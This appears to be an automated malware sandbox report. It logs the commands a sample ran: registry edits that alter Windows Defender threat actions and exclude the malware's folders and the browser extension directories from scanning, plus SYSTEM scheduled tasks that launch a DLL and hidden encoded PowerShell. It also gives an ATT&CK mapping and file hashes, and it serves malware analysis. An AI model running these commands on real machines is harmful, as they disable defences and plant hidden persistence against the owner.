C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:3708

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:3432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:4724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4556

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:4960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:4440

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:2548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:4220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:4544

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:1172

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:2316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GiPqhqLluuCEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GiPqhqLluuCEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HCtEkPSKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HCtEkPSKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aSRIytoBnSqU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aSRIytoBnSqU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lOSXAGLcobUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lOSXAGLcobUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hduqDfvYrAfrHLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hduqDfvYrAfrHLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\uxsKyVOxFpVdyluD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\uxsKyVOxFpVdyluD\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1072

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2196

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hduqDfvYrAfrHLVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hduqDfvYrAfrHLVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:3640

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1408

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp /t REG_DWORD /d 0 /reg:32
3⤵
PID:1084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp /t REG_DWORD /d 0 /reg:64
3⤵
PID:4596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\uxsKyVOxFpVdyluD /t REG_DWORD /d 0 /reg:32
3⤵
PID:4812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\uxsKyVOxFpVdyluD /t REG_DWORD /d 0 /reg:64
3⤵
PID:884

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gtEboKwAk" /SC once /ST 01:03:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:408

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gtEboKwAk"
2⤵
PID:2308

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gtEboKwAk"
2⤵
PID:3628

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nXyehDwmHPyyRtSpH"
2⤵
PID:3568

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nXyehDwmHPyyRtSpH"
2⤵
PID:3220

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nXyehDwmHPyyRtSpH2"
2⤵
PID:1372

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nXyehDwmHPyyRtSpH2"
2⤵
PID:3056

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "aPDUmbyOvRHXxkUgy"
2⤵
PID:4512

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "aPDUmbyOvRHXxkUgy"
2⤵
PID:2584

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "aPDUmbyOvRHXxkUgy2"
2⤵
PID:4992

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "aPDUmbyOvRHXxkUgy2"
2⤵
PID:4500

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "MVHoCtCeIZaPacKATKY"
2⤵
PID:4352

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MVHoCtCeIZaPacKATKY"
2⤵
PID:4712

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "MVHoCtCeIZaPacKATKY2"
2⤵
PID:1772

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MVHoCtCeIZaPacKATKY2"
2⤵
PID:5036

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "QyHDZeZycVybuDMKzsX"
2⤵
PID:1244

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QyHDZeZycVybuDMKzsX"
2⤵
PID:3972

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "QyHDZeZycVybuDMKzsX2"
2⤵
PID:5076

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QyHDZeZycVybuDMKzsX2"
2⤵
PID:3760

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\HCtEkPSKU\xUdFVd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "kuRaZQzPzSEXqOG" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3956

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "LHaWkDmLjErwAUu"
2⤵
PID:2376

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "LHaWkDmLjErwAUu"
2⤵
PID:2860

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "LHaWkDmLjErwAUu2"
2⤵
PID:2452

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "LHaWkDmLjErwAUu2"
2⤵
PID:2728

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FDoxwemLCToLkG"
2⤵
PID:2756

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FDoxwemLCToLkG"
2⤵
PID:4080

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZqYrCjlOPEYEs"
2⤵
PID:1832

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZqYrCjlOPEYEs"
2⤵
PID:4684

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZqYrCjlOPEYEs2"
2⤵
PID:3816

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZqYrCjlOPEYEs2"
2⤵
PID:1240

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "kuRaZQzPzSEXqOG2" /F /xml "C:\Program Files (x86)\HCtEkPSKU\AtzYPTX.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1800

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "kuRaZQzPzSEXqOG"
2⤵
PID:5008

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "kuRaZQzPzSEXqOG"
2⤵
PID:3192

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "JtqMXtEvkLBXZN" /F /xml "C:\Program Files (x86)\aSRIytoBnSqU2\rJopSUQ.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4936

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "lYzkwzoDPQRBQ2" /F /xml "C:\ProgramData\hduqDfvYrAfrHLVB\xHBQSFf.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1688

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "aPDUmbyOvRHXxkUgy2" /F /xml "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\QAsjNlw.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:808

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QyHDZeZycVybuDMKzsX2" /F /xml "C:\Program Files (x86)\GiPqhqLluuCEC\VrNNevo.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 628
2⤵
- Program crash
PID:1588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3368

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:4724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1328

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4388 -ip 4388
1⤵
PID:3840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GiPqhqLluuCEC\VrNNevo.xml

Filesize
2KB

MD5
bc6b7773f32cb049af998fd31d4bb06d

SHA1
291a6d3df7687e6ad3329e6a46d60dc69d4ca9c5

SHA256
901a504099610e2b6eec506f3bbcb1d2706ffa90cbc1e5096e883d9ef81dd653

SHA512
b131ad25a1363fa04e6cba3d5d91501d53cba457fae5ca70696b819a48e76285d50f8d41366cbf814d98ab9d5b0966d70f1740f56be95ab22933c568811c3fc7

Download Submit
C:\Program Files (x86)\HCtEkPSKU\AtzYPTX.xml

Filesize
2KB

MD5
eeea76d2aa5853b713a5468e5ac9645a

SHA1
8849d3420074eec369f31b2f07a894c409bb848e

SHA256
85381e1bcda7ce10e387a9c552c7870e63a861d32a93de540c8631b70af9891c

SHA512
315f65cff2e8f1e9eed3905231cf370a5a7663d313152c2ff30ef95e314c636212a7bcd7398b718d866c384971900cf4ef6ccfbd716afae5bace210b82e828e1

Download Submit
C:\Program Files (x86)\aSRIytoBnSqU2\rJopSUQ.xml

Filesize
2KB

MD5
1b4d2ecb984eb0248ef5f0a0091956e4

SHA1
18e377a25d20685ea2e603d1955a9cf05f6748aa

SHA256
df8cfc4508e95b6a660a05e071ab0ae991fef783a974dc812125b5824059ab26

SHA512
c81bda5b00a1193a12714fd6a0529242f9dfd03df5e3f283a638d89c8a63a92f611a43edb2ea35e9805bf2faacae998b2adb876ad1d6e9c1b289d999d1d92cfc

Download Submit
C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\QAsjNlw.xml

Filesize
2KB

MD5
78b714e3361cbd3fb705b52a4f13e221

SHA1
87cefbb36094581bb0a950cd2ac57286b1d2f4c9

SHA256
9ac49bd4623854725065a2685786868a848f86d8ef1e2f8d566360b1921da913

SHA512
ab36b99e2593f49a7b8b7d624471df78cc1fc07bfa1b86018a32cfcd0d3ba3c2d9946beca4a1dd44336f1cd30975a07d167600804638f647f09ce2848f38eb03

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpi

Filesize
640KB

MD5
d5e42918192922866445ef81653525bd

SHA1
8467d66f8de894702935a579fae1c468aa1c2c88

SHA256
51b0fd8dd7c18d2f24393cab12302162989ce55a77d84b3623be0390d29bbab9

SHA512
9ed14cccfadefcf1c373043b37e6258892a79ef0b61bc568d8e997d72032a8844da343e5489635e52f843dedb959ae62f76197c95c8d21944ddbb9be5b48d858

Download Submit
C:\ProgramData\hduqDfvYrAfrHLVB\xHBQSFf.xml

Filesize
2KB

MD5
794be5b84c432c7530433bce884f484e

SHA1
376b732cf7deae5371ded300f753f6dfb56ea0a3

SHA256
f3bb125081697c2146cdd4a611e9273a5d5ba7479e7eec81494b0e03914db184

SHA512
15d3e8c57d1dbd15c079917608c2f0cfac3a7ad3c1e945b47c93a4d256870b4adf17548a246e63beae899df7a83d9ca822c97660bf7b1e02a8c4809ab887b1b9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\_locales\en\messages.json

Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\_locales\pt_BR\messages.json

Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
def65711d78669d7f8e69313be4acf2e

SHA1
6522ebf1de09eeb981e270bd95114bc69a49cda6

SHA256
aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

SHA512
05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\aneflabkdpehfjhpeghlemlgojmmeioc\1.2_0\_locales\es\messages.json

Filesize
186B

MD5
a14d4b287e82b0c724252d7060b6d9e9

SHA1
da9d3da2df385d48f607445803f5817f635cc52d

SHA256
1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152

SHA512
1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
c3344976e52b76ae0d50704b759d97b5

SHA1
6ba554e67b495b4dc38d967ebbdb6849afe12f21

SHA256
7a5271a0acbb3ab9af0834983ae54c86a6d1c9e5e737c3876b192fd188aa783f

SHA512
e651900fdc37e6b2793acdc90a3143f1dd58c2b9c96e6bd01f3e7bc89a42113164ed6fd61ce48fe7a189b91317bb497ffa7c45433c15c1f57036179182f61ee9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
54d6c2df968675c3e5bdbb2d6644f2ec

SHA1
8856e88060b0f6bb1eaca66129b13684ba0788f5

SHA256
9c17242563d927f9ee5453cc38b8dc2470c6713bc1fa594a072649f6aa4b4a5e

SHA512
0718282a08f1e8cafad76b7335aeac13737ff1e6db3288a525a459aeac6991105d189d2e704d066658feccdf27cccc787833e3562f88ddafb2b776a0d682cc5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
a4f1b8fd207c4c9d1d3f594c5b8a6bcd

SHA1
4f0b123e523499804e523a91f9a03de5bde8df46

SHA256
3cb334a6782b4654760759468a769707334a562db738cdbfeba379f0b2336686

SHA512
7fc7f444a2ba797b1f0d6e183cbde7d04c586ce31268505583aeb3bb4aa91f88ae83a032d089b2ff8527e48a77753be9d6691dbb9c23bc001ba19a7bd2c82f2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1j25llng.wn1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
